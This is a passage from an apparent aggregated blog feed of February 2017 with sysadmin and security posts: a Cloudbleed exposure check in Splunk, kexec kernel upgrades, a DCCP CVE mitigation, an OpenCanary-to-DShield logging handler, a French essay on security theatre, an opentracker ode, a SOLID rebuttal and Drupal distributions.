  '108.162.192.0/18', '131.0.72.0/22', '141.101.64.0/18', '162.158.0.0/15',
  '172.64.0.0/13', '173.245.48.0/20', '188.114.96.0/20', '190.93.240.0/20',
  '197.234.240.0/22', '198.41.128.0/17', '199.27.128.0/21' ]
for cidr in cidrs:
  for ip in IPNetwork(cidr):
    print '%s' % ip

The generated file can now be imported as a lookup table in Splunk. My DNS requests are logged through a Bro instance. Using the following query, I extracted URLs that are resolved with a Cloudflare IP address:

sourcetype=bro_dns rcode=A NOT qclass = "*.cloudflare.com" |
lookup cloudflare.csv TTLs OUTPUT TTLs as ip |
search ip="*" |
dedup qclass |
table qclass

(The query is very easy to adapt to your own environment.)

For the last 6 months, I got a list of 158 websites. The last step is manual: review the URLs and if you’ve accounts or posted sensitive information with them, it’s time to change your passwords / API keys!

[The post Am I Affected by Cloudbleed? has been first published on /dev/random]

February 23, 2017

The post Kernel patching with kexec: updating a CentOS 7 kernel without a full reboot appeared first on ma.ttias.be.

tl;dr: you can use kexec to stage a kernel upgrade in-memory without the need for a full reboot. Your system will reload the new kernel on the fly and activate it. There will be a service restart of every running service as the new kernel is loaded, but you skip the entire bootloader & hardware initialization.

By using kexec you can upgrade your running Linux machine's kernel without a full reboot. Keep in mind, there's still a new kernel load, but it's significantly faster than doing the whole bootloader stage and hardware initialization phase performed by the system firmware (BIOS or UEFI).

Yes, calling this kernel upgrades without reboots is a vast exaggeration. You skip parts of the reboot, though, usually the slowest parts.

Installing kexec

On a CentOS 7 machine the kexec tools should be installed by default, but just in case they aren't;

$ yum install kexec-tools

After that, the kexec binary should be available to you.

Install your new kernel

In this example I'll upgrade a rather old CentOS 7 kernel to the latest.

$ uname -r
3.10.0-229.14.1.el7

So I'm now running the 3.10.0-229.14.1.el7 kernel.

To upgrade your kernel, first install the latest kernel packages.

$ yum update kernel
...
===================================================================================
 Package                 Arch      Version                        Repository  Size
===================================================================================
Installing:
 kernel                  x86_64    3.10.0-514.6.1.el7             updates     37 M

This will install the

3.10.0-514.6.1.el7

kernel on my machine.

So a quick summary (on new lines, so you see the kernel version difference):

From: 3.10.0-229.14.1.el7
To: 3.10.0-514.6.1.el7

$ rpm -qa | grep kernel | sort
kernel-3.10.0-229.14.1.el7.x86_64
kernel-3.10.0-514.6.1.el7.x86_64

Once you installed the new kernel, it's time for the kexec in-memory upgrading magic.

In-memory kernel upgrade with kexec

As a safety command, unload any previously attempted kernels first. This is harmless and will make sure you start "cleanly" with your upgrade process.

$ kexec -u

Now, state the new kernel to be loaded. Note these are the version numbers of the latest installed kernel with yum, as shown above.

$ kexec -l /boot/vmlinuz-3.10.0-514.6.1.el7.x86_64 \
 --initrd=/boot/initramfs-3.10.0-514.6.1.el7.x86_64.img \
 --reuse-cmdline

Careful: next command will reload a new kernel and will impact running services!

Once prepared, start kexec.

$ systemctl kexec

Your system will freeze for a couple of seconds, load the new kernel and be good to go.

Some benchmarks

A very quick and unscientific benchmark of doing a yum update kernel with and without kexec.

Normal way, kernel upgrade + reboot: 28s
Kexec way, kernel upgrade + reload: 19s

So you have a couple of seconds of the new kernel load, for big physical machines with lots of RAM, this will be even more as the entire POST check can be skipped with this method.

Here's a side-by-side run of the same kernel update. On the left: the kexec flow you've read above. On the right, a classic yum update kernel && reboot.

Notice how the left VM never goes into the BIOS or POST checks.

If you're going to be automating these updates, have a look at some existing scripts to help you going: kexec-reboot, ArchWiki on kexec.

The post Kernel patching with kexec: updating a CentOS 7 kernel without a full reboot appeared first on ma.ttias.be.

February 22, 2017

The post Linux kernel: CVE-2017-6074 – local privilege escalation in DCCP appeared first on ma.ttias.be.

Patching time, again.

This is an announcement about CVE-2017-6074 [1] which is a double-free
vulnerability I found in the Linux kernel. It can be exploited to gain
kernel code execution from an unprivileged processes.

[oss-security] Linux kernel: CVE-2017-6074: DCCP double-free vulnerability (local root)

This privilege escalation exploit is active on pretty much every kernel in use out there. CentOS 5, 6 and 7 are vulnerable according to the kernel versions.

The oldest version that was checked is 2.6.18 (Sep 2006), which is
vulnerable. However, the bug was introduced before that, probably in
the first release with DCCP support (2.6.14, Oct 2005).

The kernel needs to be built with CONFIG_IP_DCCP for the vulnerability
to be present. A lot of modern distributions enable this option by
default.

[oss-security] Linux kernel: CVE-2017-6074: DCCP double-free vulnerability (local root)

Red Hat's bug tracker provides some mitigation tactics without updating the kernel and rebooting your box.

Recent versions of Selinux policy can mitigate this exploit. The steps below will work with SElinux enabled or disabled.

As the DCCP module will be auto loaded when required, its use can be disabled
by preventing the module from loading with the following instructions.

 # echo "install dccp /bin/true" >> /etc/modprobe.d/disable-dccp.conf 

The system will need to be restarted if the dccp modules are loaded. In most circumstances the dccp kernel modules will be unable to be unloaded while any network interfaces are active and the protocol is in use.

If you need further assistance, see this KCS article ( https://access.redhat.com/solutions/41278 ) or contact Red Hat Global Support Services.

(CVE-2017-6074) CVE-2017-6074 kernel: use after free in dccp protocol

More details are hidden behind Red Hat's subscription wall, but the mitigation tactic shown above should be sufficient in most cases.

In fact, there don't seem to be updated kernel packages for CentOS just yet, so the above is -- at the time of writing -- the only mitigation tactic you have.

The post Linux kernel: CVE-2017-6074 – local privilege escalation in DCCP appeared first on ma.ttias.be.

La sécurité est un terme sur toutes les lèvres mais bien peu sont en mesure de la définir et de la concevoir rationnellement.

Je vous propose la définition suivante :

« La sécurité est l’ensemble des actions et des mesures mises en œuvre par une collectivité pour s’assurer que ses membres respectent les règles de la collectivité. »

Remarquons que la sécurité individuelle n’est garantie que si elle est explicite dans les règles de la collectivité. Si les règles précisent qu’il est permis de tuer, par exemple des esclaves, ces individus ne sont pas en sécurité.

Ces actions et mesures se divisent en trois grandes catégories, que j’appelle les trois piliers de la sécurité : la morale, les conséquences et le coût.

Le pilier moral

Le premier pilier est l’ensemble des incitants moraux qui encouragent l’individu à respecter les règles de la société. Ce pilier agit donc au niveau individuel et se transmet par l’éducation et la propagande.

Un excellent exemple de l’utilisation du pilier moral est le « piratage de musique ». À coup de propagande, les grandes maisons de disque ont fait entrer dans la tête des gens que télécharger une chanson équivalait virtuellement à voler voire blesser un artiste.

Cette affirmation est rationnellement absurde mais l’éducation morale a été telle que, aujourd’hui encore, pirater de la musique est perçu comme immoral. De manière amusante, ce phénomène est bien moindre avec les logiciels ou les séries télé car le côté « artiste spolié » est beaucoup moins pregnant dans l’imaginaire collectif pour ce type d’œuvres.

Le pilier des conséquences

Le second pilier est un facteur résultant de la multiplication du risque d’être pris en train de briser les règles avec la conséquence prévue en cas de flagrant délit.

Par exemple, malgré de nombreuses tentatives d’utilisation du pilier moral à travers les campagnes de la sécurité routière, la plupart des conducteurs ne respectent pas les limites de vitesse.

Des amendes ont donc été mises en place, parfois très élevée. Mais ces amendes ne sont pas dissuasives si le conducteur a l’impression que le risque d’être pris est nul. 0 multiplié par une grosse amende fait toujours 0.

Des contrôles radars ont donc été mis en place, en tentant de les garder secrets et d’interdire les détecteurs de radar. Mais là encore, l’efficacité s’est révélée limitée, le risque étant toujours perçu comme faible et relevant du « pas de chance ».

Par contre, l’installation de radars automatiques avec de grands panneaux « attention radar » a eu un effet drastique sur ces endroits en particuliers. Les conducteurs ralentissent et respectent la limitation, même si c’est pour une durée limitée.

Le pilier du coût

Enfin, il existe des situation où l’on se fiche de la morale et des conséquences. Le dernier pilier sécuritaire consiste donc à augmenter le coût nécessaire à briser les règles.

Ce coût peut prendre différentes formes : le temps, l’argent, l’expertise, le matériel.

Par exemple, je sais qu’un voleur de vélo se fout du pilier moral. Il a également peu de chances d’être pincé et donc n’a pas peur du pilier des conséquences. Je peux cependant légèrement augmenter pour lui le risque d’être pris en faisant tatouer mon vélo, mais c’est faible.

Par contre, je peux rendre le vol de mon vélo le plus coûteux possible en utilisant un très bon cadenas.

Voler mon vélo nécessitera donc plus de temps et plus de matériel que si mon cadenas était basique.

Les serrures sur votre porte ne sont qu’une augmentation du coût nécessaire pour rentrer chez vous sans la clé. Ce coût sera soit du temps (s’il faut fracturer la porte), soit en expertise (un serrurier vous ouvrira votre porte en quelques secondes).

Le théâtre sécuritaire

Toutes les mesures de sécurité qui sont prises doivent agir sur l’un de ces trois piliers. Des mesures peuvent même avoir des effets sur plusieurs piliers. En augmentant le temps nécessaire à enfreindre une règle (pilier du coût), on augmentera également la perception du risque d’être attrapé (pilier des conséquences).

Cependant, il existe également des mesures qui ne rentrent dans aucune de ces catégories. Ces mesures ne sont donc pas des mesures visant à augmenter la sécurité.

Par exemple, les militaires patrouillant dans les rues pour lutter contre le risque qu’un fou terroriste se fasse sauter. Les militaires n’ont clairement pas une influence sur le pilier moral. Ils n’ont pas d’influence sur le pilier des conséquences (un kamikaze se fout des conséquences). Et ils n’ont pas non plus d’influence sur le coût. Si vous voulez vous faire sauter, la présence de militaires armés dans les parages ne change rien à vos plans !

Cette analyse est donc importante car elle permet de détecter les mesures de non-sécurité. Ces mesures ne sont donc pas sécuritaires mais ont d’autres motivations. À titre d’exemple, les militaires dans la rue servent à donner l’impression à la population que le gouvernement agit. En effet, la seule action pertinente contre le terrorisme est le renseignement et l’action discrète mais la population aura alors l’impression que le gouvernement ne fait rien.

On appelle « security theatre » les mesures qui ne renforcent pas la sécurité mais ne servent qu’à donner l’image d’une sécurité renforcée. Dans certains cas, ces mesures sont justifiées (elles rassurent), dans d’autres, elles sont nocives (elles entraînent un sentiment de peur irrationnelle, sont elles-mêmes source d’insécurité).

Autre exemple : aux États-Unis, plusieurs états républicains ont mis en place des mesures pour soi-disant se protéger des fraudes électorales. Problème : ces mesures sont absolument inefficaces, adressent un problème dont l’existence n’a jamais été démontré mais elles ont un effet immédiat. Elle rende le vote très difficile voire impossible pour une grande partie des minorités et des populations les plus pauvres qui ont tendance à voter démocrate. Sous couvert de la sécurité, on prend des mesures dont l’objectif réel est d’avantager un parti.

Identifier les abus de sécurité

Lorsque des mesures de sécurité sont mises en place et qu’elles n’agissent efficacement sur aucun des 3 piliers, il est nécessaire d’être vigilant : la motivation n’est pas la sécurité mais certainement autre chose.

Si l’on prend des mesures pour soi-disant garantir votre sécurité, posez-vous toujours les bonnes questions :

– Est-ce que le problème est quantifié en termes de gravité et de probabilité ?
– Les mesures proposées adressent-elles efficacement au moins un des trois piliers ?
– Le coût et les conséquences de ces mesures sont-elles en relation avec le risque dont elles protègent ?

Mais si on applique la rationalité à la sécurité, on arrive à la conclusion effarante que pour nous protéger, nous devrions prendre des mesures drastiques pour réguler la circulation automobile, la qualité de notre alimentation et de l’air que nous respirons. Au lieu de ça, nous laissons nos émotions être manipulées, nous envoyons des soldats risquer leur vie un peu partout dans le monde ou nous luttons contre les freins à disque sur les vélos.

Au fond, nous ne cherchons pas la sécurité, nous cherchons à être rassuré sans devoir rien changer à notre mode de vie. Quoi de plus approprié pour cela qu’un ennemi commun et un régime totalitaire pour nous empêcher de penser ?

 

Photo par CWCS Managed Hosting.

Ce texte est a été publié grâce à votre soutien régulier sur Tipeee et sur Paypal. Je suis @ploum, blogueur, écrivain, conférencier et futurologue. Vous pouvez me suivre sur Facebook, Medium ou me contacter.

Ce texte est publié sous la licence CC-By BE.

February 21, 2017

It’s been a while since my last post (18/01/2014) … This year I made a new year’s resolution to blog more (like I did in the good old days).

My first post since the silent years will be a bit of reflecting on why I actually haven’t blogged much and what I did instead. There are off course a lot of reasons why but in essence it boils down to a very simple reason. You set yourself priorities and whenever you don’t have much time, the things that don’t have a high priority you abandon … so blogging was for me not as important as my family, my work, … (you get the picture).

But there is actually another ‘good’ reason: Information overload. I’m constantly reading, viewing presentations, doing small Proof Of Concepts, … and doing these things has taken over producing content myself … I hope I can do things better in 2017 … let’s see 🙂

So What did I do in those last couple of years on a technical side:

Webpack + React + Redux

People who know me, are aware that I’m sometimes complaining about the javascript eco-system. On a regular basis I need to decide which technologies we are going to use to build a system that needs to be maintained for many years. During the last 4 years I’ve done assessments of which frontend framework to use. At times it really felt like the well known blogpost.

I’m pretty glad the Javascript eco system is stabilising (or so it seems). I decided to take a deep dive into Webpack, React, Rexud, …

simple conclusion: I’m glad I took the time to learn all these technologies a bit more in depth.

Vert.x

I’ve done several small NodeJS projects, for bigger applications I’m still more a fan of the Java / JVM world as it still feels more mature for me. However the concept of Node is simple and elegant, so if you have a similar solution in your preferred eco-system, you need to do some investigations … right?

simple conclusion: I’m glad I took the time to learn all these technologies a bit more in depth.

Amazon Web Services

Using one of the online platforms I took a pretty long track on a lot of the features of the AWS platform. I’ve been a frequent user of their services, but they are constantly inventing new things and there were still some blind spots for myself. That’s now much better with guided training and experiments.

simple conclusion: I’m glad I took the time to learn all these technologies a bit more in depth.

Scala course

On Coursera I followed a course on Scala. I followed already some talks and presentations, but never programmed it myself. During this session I was obliged to write Scala code myself. The least I can say is that it was … interesting 🙂

simple conclusion: I’m glad I took it, but will have to look for a more hands-on track as this was a bit to much focused on the theory instead of building real world applications.

NoSQL Tracks

I’ve done courses on MongoDB and Elastic Search. Both very nice products with their own positive and negative points. I’m using these technologies in several of our production systems and things are stable. Like all technologies there is some adapting and learning how they work in a production environment, but they fill the gap needed filling. So I’m glad we took this road.

simple conclusion: I’m glad I took the time to learn all these technologies a bit more in depth.

Mobile Development

My company builds server side applications, frontend applications and also mobile applications. In the previous company I founded, I wasn’t “officially” allowed to build mobile apps, so I had to beef up on this … which I did. In the meantime, I’ve build applications using Xamarin, Native Android, Native iOS (objective C, Swift is on the Todo) and Ionic (React Native is on the todo).

Very simple conclusion: doing what you love without technological impediments is how every developers life should be …

I’ll keep some more for my next post, but I’ll also do some more real technical articles.

See you soon (or so I hope)

February 20, 2017

This is an ode to Dirk Engling’s OpenTracker.

It’s a BitTorrent tracker.

It’s what powered The Pirate Bay in 2007–2009.

I’ve been using it to power the downloads on http://driverpacks.net since the end of November 2010. >6 years. It facilitated 9839566 downloads since December 1, 2010 until today. That’s almost 10 million downloads!

Stability

It’s one of the most stable pieces of software I ever encountered. I compiled it in 2010, it never once crashed. I’ve seen uptimes of hundreds of days.

wim@ajax:~$ ls -al /data/opentracker
total 456
drwxr-xr-x  3 wim  wim   4096 Feb 11 01:02 .
drwxr-x--x 10 root wim   4096 Mar  8  2012 ..
-rwxr-xr-x  1 wim  wim  84824 Nov 29  2010 opentracker
-rw-r--r--  1 wim  wim   3538 Nov 29  2010 opentracker.conf
drwxr-xr-x  4 wim  wim   4096 Nov 19  2010 src
-rw-r--r--  1 wim  wim 243611 Nov 19  2010 src.tgz
-rwxrwxrwx  1 wim  wim  14022 Dec 24  2012 whitelist

Simplicity

The simplicity is fantastic. Getting up and running is incredibly simple: git clone git://erdgeist.org/opentracker .; make; ./opentracker and you’re up and running. Let me quote a bit from its homepage, to show that it goes the extra mile to make users successful:

opentracker can be run by just typing ./opentracker. This will make opentracker bind to 0.0.0.0:6969 and happily serve all torrents presented to it. If ran as root, opentracker will immediately chroot to . and drop all priviliges after binding to whatever tcp or udp ports it is requested.

Emphasis mine. And I can’t emphasize my emphasis enough.

Performance & efficiency

All the while handling dozens of requests per second, opentracker causes less load than background processes of the OS. Let me again quote a bit from its homepage:

opentracker can easily serve multiple thousands of requests on a standard plastic WLAN-router, limited only by your kernels capabilities ;)

That’s also what the homepage said in 2010. It’s one of the reasons why I dared to give it a try. I didn’t test it on a “plastic WLAN-router”, but everything I’ve seen confirms it.

Flexibility

Its defaults are sane, but what if you want to have a whitelist?

  1. Uncomment the #FEATURES+=-DWANT_ACCESSLIST_WHITE line in the Makefile.
  2. Recompile.
  3. Create a file called whitelist, with one torrent hash per line.

Have a need to update this whitelist, for example a new release of your software to distribute? Of course you don’t want to reboot your opentracker instance and lose all current state. It’s got you covered:

  1. Append a line to whitelist.
  2. Send the SIGHUP UNIX signal to make opentracker reload its whitelist1.

Deployment

I’ve been in the process of moving off of my current (super reliable, but also expensive) hosting. There are plenty of specialized companies offering HTTP hosting2 and even rsync hosting3. Thanks to their standardization and consequent scale, they can offer very low prices.

But I also needed to continue to run my own BitTorrent tracker. There are no companies that offer that. I don’t want to rely on another tracker, because I want there to be zero affiliation with illegal files4. This is a BitTorrent tracker that does not allow anything to be shared: it only allows the software releases made by http://driverpacks.net to be downloaded.

So, I found the cheapest VPS I could find, with the least amount of resources. For USD $13.505, I got the lowest specced VPS from a reliable-looking provider: with 128 MB RAM. Then I set it up:

  1. ssh‘d onto it.
  2. rsync‘d over the files from my current server (alternatively: git clone and make)
  3. added @reboot /data/opentracker/opentracker -f /data/opentracker/opentracker.conf to my crontab.
  4. removed the CNAME record for tracker.driverpacks.net, and instead made it an A record pointing to my new VPS.
  5. watched http://tracker.driverpacks.net:6969/stats?mode=tpbs&format=txt on both the new and the old server, to verify traffic was moving over to my new cheap opentracker VPS as the DNS changes propagated

Drupal module

Since driverpacks.net runs on Drupal, there of course is an OpenTracker Drupal module to integrate the two (I wrote it). It provides an API to:

  • create .torrent files for certain files uploaded to Drupal
  • append to the OpenTracker whitelist file6
  • parse the statistics provided by the OpenTracker instance

You can see the live stats at http://driverpacks.net/stats.

Conclusion

opentracker is the sort of simple, elegant software design that makes it a pleasure to use. And considering the low commit frequency over the past decade, with many of those commits being nitpick fixes, it also seems its simplicity also leads to excellent maintainability. It involves the HTTP and BitTorrent protocols, yet only relies on a single I/O library, and its source code is very readable. Not only that, but it’s also highly scalable.

It’s the sort of software many of us aspire to write.

Finally, its license. A glorious license indeed!

The beerware license is very open, close to public domain, but insists on honoring the original author by just not claiming that the code is yours. Instead assume that someone writing Open Source Software in the domain you’re obviously interested in would be a nice match for having a beer with.

So, just keep the name and contact details intact and if you ever meet the author in person, just have an appropriate brand of sparkling beverage choice together. The conversation will be worth the time for both of you.

Dirk, if you read this: I’d love to buy you sparkling beverages some time :)


  1. kill -s HUP pidof opentracker ↩︎

  2. I’m using Gandi’s Simple Hosting↩︎

  3. https://rsync.net ↩︎

  4. Also: all my existing torrents use http://tracker.driverpacks.net:6969/announce as the URL. The free trackers I could find were all using udp://. So new leechers would then no longer be able to find the hundreds of existing seeders. Adding trackers to already-downloaded torrents is not possible. ↩︎

  5. $16.34 including 21% Belgian VAT↩︎

  6. Rather than having the Drupal module send a SIGHUP from within PHP, which requires elevated rights, I instead opted for a cronjob that runs every 10 minutes: */10 * * * * kill -s HUP pidof opentracker↩︎

February 18, 2017

February 17, 2017

Alternative title: Dan North, the Straw Man That Put His Head in His Ass.

This blog post is a reply to Dan’s presentation Why Every Element of SOLID is Wrong. It is crammed full with straw man argumentation in which he misinterprets what the SOLID principles are about. After refuting each principle he proposes an alternative, typically a well-accepted non-SOLID principle that does not contradict SOLID. If you are not that familiar with the SOLID principles and cannot spot the bullshit in his presentation, this blog post is for you. The same goes if you enjoy bullshit being pointed out and broken down.

What follows are screenshots of select slides with comments on them underneath.

Dan starts by asking “What is a single responsibility anyway?”. Perhaps he should have figured that out before giving a presentation about how it is wrong.

A short (non-comprehensive) description of the principle: systems change for various different reasons. Perhaps a database expert changes the database schema for performance reasons, perhaps a User Interface person is reorganizing the layout of a web page, perhaps a developer changes business logic. What the Single Responsibility Principle says is that ideally changes for such disparate reasons do not affect the same code. If they did, different people would get in each other’s way. Possibly worse still, if the concerns are mixed together and you want to change some UI code, suddenly you need to deal with and thus understand, the business logic and database code.

How can we predict what is going to change? Clearly you can’t, and this is simply not needed to follow the Single Responsibility Principle or to get value out of it.

Write simple code… no shit. One of the best ways to write simple code is to separate concerns. You can be needlessly vague about it and simply state “write simple code”. I’m going to label this Dan North’s Pointlessly Vague Principle. Congratulations sir.

The idea behind the Open Closed Principle is not that complicated. To partially quote the first line on the Wikipedia Page (my emphasis):

… such an entity can allow its behaviour to be extended without modifying its source code.

In other words, when you ADD behavior, you should not have to change existing code. This is very nice, since you can add new functionality without having to rewrite old code. Contrast this to shotgun surgery, where to make an addition, you need to modify existing code at various places in the codebase.

In practice, you cannot gain full adherence to this principle, and you will have places where you will need to modify existing code. Full adherence to the principle is not the point. Like with all engineering principles, they are guidelines which live in a complex world of trade offs. Knowing these guidelines is very useful.

Clearly it’s a bad idea to leave code in place that is wrong after a requirement change. That’s not what this principle is about.

Another very informative “simple code is a good thing” slide.

To be honest, I’m not entirely sure what Dan is getting at with his “is-a, has-a” vs “acts-like-a, can-be-used-as-a”. It does make me think of the Interface Segregation Principle, which, coincidentally, is the next principle he misinterprets.

The remainder of this slide is about the “favor compositions about inheritance” principle. This is really good advice, which has been well-accepted in professional circles for a long time. This principle is about code sharing, which is generally better done via composition than inheritance (the latter creates very strong coupling). In the last big application I wrote I have several 100s of classes and less than a handful inherit concrete code. Inheritance has a use which is completely different from code reuse: sub-typing and polymorphism. I won’t go into detail about those here, and will just say that this is at the core of what Object Orientation is about, and that even in the application I mentioned, this is used all over, making the Liskov Substitution Principle very relevant.

Here Dan is slamming the principle for being too obvious? Really?

“Design small , role-based classes”. Here Dan changed “interfaces” into “classes”. Which results in a line that makes me think of the Single Responsibility Principle. More importantly, there is a misunderstanding about the meaning of the word “interface” here. This principle is about the abstract concept of an interface, not the language construct that you find in some programming languages such as Java and PHP. A class forms an interface. This principle applies to OO languages that do not have an interface keyword such as Python and even to those that do not have a class keyword such as Lua.

If you follow the Interface Segregation Principle and create interfaces designed for specific clients, it becomes much easier to construct or invoke those clients. You won’t have to provide additional dependencies that your client does not actually care about. In addition, if you are doing something with those extra dependencies, you know this client will not be affected.

This is a bit bizarre. The definition Dan provides is good enough, even though it is incomplete, which can be excused by it being a slide. From the slide it’s clear that the Dependency Inversion Principle is about dependencies (who would have guessed) and coupling. The next slide is about how reuse is overrated. As we’ve already established, this is not what the principle is about.

As to the DIP leading to DI frameworks that you then depend on… this is like saying that if you eat food you might eat non-nutritious food which is not healthy. The fix here is to not eat non-nutritious food, it is not to reject food altogether. Remember the application I mentioned? It uses dependency injection all the way, without using any framework or magic. In fact, 95% of the code does not bind to the web-framework used due to adherence to the Dependency Inversion Principle. (Read more about this application)

That attitude explains a lot about the preceding slides.

Yeah, please do write simple code. The SOLID principles and many others can help you with this difficult task. There is a lot of hard-won knowledge in our industry and many problems are well understood. Frivolously rejecting that knowledge with “I know better” is an act of supreme arrogance and ignorance.

I do hope this is the category Dan falls into, because the alternative of purposefully misleading people for personal profit (attention via controversy) rustles my jimmies.

If you’re not familiar with the SOLID principles, I recommend you start by reading their associated Wikipedia pages. If you are like me, it will take you practice to truly understand the principles and their implications and to find out where they break down or should be superseded. Knowing about them and keeping an open mind is already a good start, which will likely lead you to many other interesting principles and practices.

February 15, 2017

Being a volunteer for the SANS Internet Storm Center, I’m a big fan of the DShield service. I think that I’m feeding DShield with logs for eight or nine years now. In 2011, I wrote a Perl script to send my OSSEC firewall logs to DShield. This script has been running and pushing my logs every 30 mins for years. Later, DShield was extended to collect other logs: SSH credentials collected by honeypots (if you’ve a unused Raspberry Pi, there is a nice setup of a honeypot available). I’ve my own network of honeypots spread here and there on the Wild Internet, running Cowrie. But recently, I reconfigured all of them to use another type of honeypot: OpenCanary.

Why OpenCanary? Cowrie is a very nice honeypot which can emulate a fake vulnerable host, log commands executed by the attackers and also collect dropped files. Here is an example of Cowrie session replayed in Splunk:

Splunk Honeypot Session Replay

It’s nice to capture a lot of data but most of them (to not say “all of them”) are generated by bots. Honestly, I never detected a human attacker trying to abuse of my SSH honeypots. That’s why I decided to switch to OpenCanary. It does not record a detailed log as Cowrie but it is very modular and supports by default the following protocols:

  • FTP
  • HTTP
  • Proxy
  • MSSQL
  • MySQL
  • NTP
  • Portscan
  • RDP
  • Samba
  • SIP
  • SNMP
  • SSH
  • Telnet
  • TFTP
  • VNC

Writing extra modules is very easy, examples are provided. By default, OpenCanary is able to write logs to the console, a file, Syslog, a JSON feed over TCP or an HPFeed. There is no DShield support by default? Never mind, let’s add it.

As I said, OpenCanary is very modular and a new logging capability is just a new Python class in the logger.py module:

class DShieldHandler(logging.Handler):
    def __init__(self, dshield_userid, dshield_authkey, allowed_ports):
        logging.Handler.__init__(self)
        self.dshield_userid = str(dshield_userid)
        self.dshield_authkey = str(dshield_authkey)
        try:
            # Extract the list of allowed ports
            self.allowed_ports = map(int, str(allowed_ports).split(','))
        except:
            # By default, report only port 22
            self.allowed_ports = [ 22 ]

    def emit(self, record):
        ...

The DShield logger needs three arguments in your opencanary.conf file:

"logger": {
    "class" : "PyLogger",
    "kwargs" : {
        "formatters": {
            "plain": {
                "format": "%(message)s"
            }
        },
        "handlers": {
            "dshield": {
                "class": "opencanary.logger.DShieldHandler",
                "dshield_userid": "xxxxxx",
                "dshield_authkey": "xxxxxxxx",
                "allowed_ports": "22,23"
            }
        }
    }
}

The DShield UserID and authentication key are available in your DShield account. I added an ‘allowed_ports’ parameter that contains the list of interesting ports that will be reported to DShield (by default only SSH connections are reported). Now, I’m reporting many more connections attempts:

Daily Connections Report

Besides DShield, JSON logs are processed by my Splunk instance to generate interesting statistics:

OpenCanary Splunk Dashboard

A pull request has been submitted to the authors of OpenCanary to integrate my code. In the mean time, the code is available on my Github repository.

[The post Integrating OpenCanary & DShield has been first published on /dev/random]

I published the following diary on isc.sans.org: “How was your stay at the Hotel La Playa?“.

I made the following demo for a customer in the scope of a security awareness event. When speaking to non-technical people, it’s always difficult to demonstrate how easily attackers can abuse of their devices and data. If successfully popping up a “calc.exe” with an exploit makes a room full of security people crazy, it’s not the case for “users”. It is mandatory to demonstrate something that will ring a bell in their mind… [Read more]

[The post [SANS ISC Diary] How was your stay at the Hotel La Playa? has been first published on /dev/random]

February 14, 2017

Yesterday, after publishing a blog post about Nasdaq's Drupal 8 distribution for investor relations websites, I realized I don't talk enough about "Drupal distributions" on my blog. The ability for anyone to take Drupal and build their own distribution is not only a powerful model, but something that is relatively unique to Drupal. To the best of my knowledge, Drupal is still the only content management system that actively encourages its community to build and share distributions.

A Drupal distribution packages a set of contributed and custom modules together with Drupal core to optimize Drupal for a specific use case or industry. For example, Open Social is a free Drupal distribution for creating private social networks. Open Social was developed by GoalGorilla, a digital agency from the Netherlands. The United Nations is currently migrating many of their own social platforms to Open Social.

Another example is Lightning, a distribution developed and maintained by Acquia. While Open Social targets a specific use case, Lightning provides a framework or starting point for any Drupal 8 project that requires more advanced layout, media, workflow and preview capabilities.

For more than 10 years, I've believed that Drupal distributions are one of Drupal's biggest opportunities. As I wrote back in 2006: Distributions allow us to create ready-made downloadable packages with their own focus and vision. This will enable Drupal to reach out to both new and different markets..

To capture this opportunity we needed to (1) make distributions less costly to build and maintain and (2) make distributions more commercially interesting.

Making distributions easier to build

Over the last 12 years we have evolved the underlying technology of Drupal distributions, making them even easier to build and maintain. We began working on distribution capabilities in 2004, when the CivicSpace Drupal 4.6 distribution was created to support Howard Dean's presidential campaign. Since then, every major Drupal release has advanced Drupal's distribution building capabilities.

The release of Drupal 5 marked a big milestone for distributions as we introduced a web-based installer and support for "installation profiles", which was the foundational technology used to create Drupal distributions. We continued to make improvements to installation profiles during the Drupal 6 release. It was these improvements that resulted in an explosion of great Drupal distributions such as OpenAtrium (an intranet distribution), OpenPublish (a distribution for online publishers), Ubercart (a commerce distribution) and Pressflow (a distribution with performance and scalability improvements).

Around the release of Drupal 7, we added distribution support to Drupal.org. This made it possible to build, host and collaborate on distributions directly on Drupal.org. Drupal 7 inspired another wave of great distributions: Commerce Kickstart (a commerce distribution), Panopoly (a generic site building distribution), Opigno LMS (a distribution for learning management services), and more! Today, Drupal.org lists over 1,000 distributions.

Most recently we've made another giant leap forward with Drupal 8. There are at least 3 important changes in Drupal 8 that make building and maintaining distributions much easier:

  1. Drupal 8 has vastly improved dependency management for modules, themes and libraries thanks to support for Composer.
  2. Drupal 8 ships with a new configuration management system that makes it much easier to share configurations.
  3. We moved a dozen of the most commonly used modules into Drupal 8 core (e.g. Views, WYSIWYG, etc), which means that maintaining a distribution requires less compatibility and testing work. It also enables an easier upgrade path.

Open Restaurant is a great example of a Drupal 8 distribution that has taken advantage of these new improvements. The Open Restaurant distribution has everything you need to build a restaurant website and uses Composer when installing the distribution.

More improvements are already in the works for future versions of Drupal. One particularly exciting development is the concept of "inheriting" distributions, which allows Drupal distributions to build upon each other. For example, Acquia Lightning could "inherit" the standard core profile – adding layout, media and workflow capabilities to Drupal core, and Open Social could inherit Lightning - adding social capabilities on top of Lightning. In this model, Open Social delegates the work of maintaining Layout, Media, and Workflow to the maintainers of Lightning. It's not too hard to see how this could radically simplify the maintenance of distributions.

The less effort it takes to build and maintain a distribution, the more distributions will emerge. The more distributions that emerge, the better Drupal can compete with a wide range of turnkey solutions in addition to new markets. Over the course of twelve years we have improved the underlying technology for building distributions, and we will continue to do so for years to come.

Making distributions commercially interesting

In 2010, after having built a couple of distributions at Acquia, I used to joke that distributions are the "most expensive lead generation tool for professional services work". This is because monetizing a distribution is hard. Fortunately, we have made progress on making distributions more commercially viable.

At Acquia, our Drupal Gardens product taught us a lot about how to monetize a single Drupal distribution through a SaaS model. We discontinued Drupal Gardens but turned what we learned from operating Drupal Gardens into Acquia Cloud Site Factory. Instead of hosting a single Drupal distribution (i.e. Drupal Gardens), we can now host any number of Drupal distributions on Acquia Cloud Site Factory.

This is why Nasdaq's offering is so interesting; it offers a powerful example of how organizations can leverage the distribution "as-a-service" model. Nasdaq has built a custom Drupal 8 distribution and offers it as-a-service to their customers. When Nasdaq makes money from their Drupal distribution they can continue to invest in both their distribution and Drupal for many years to come.

In other words, distributions have evolved from an expensive lead generation tool to something you can offer as a service at a large scale. Since 2006 we have known that hosted service models are more compelling but unfortunately at the time the technology wasn't there. Today, we have the tools that make it easier to deploy and manage large constellations of websites. This also includes providing a 24x7 help desk, SLA-based support, hosting, upgrades, theming services and go-to-market strategies. All of these improvements are making distributions more commercially viable.

Last week, I joined the mgmt hackathon, just after Config Management Camp Ghent. It helped me understanding how mgmt actually works and that helped me to introduce two improvements in the codebase: prometheus support, and an augeas resource.

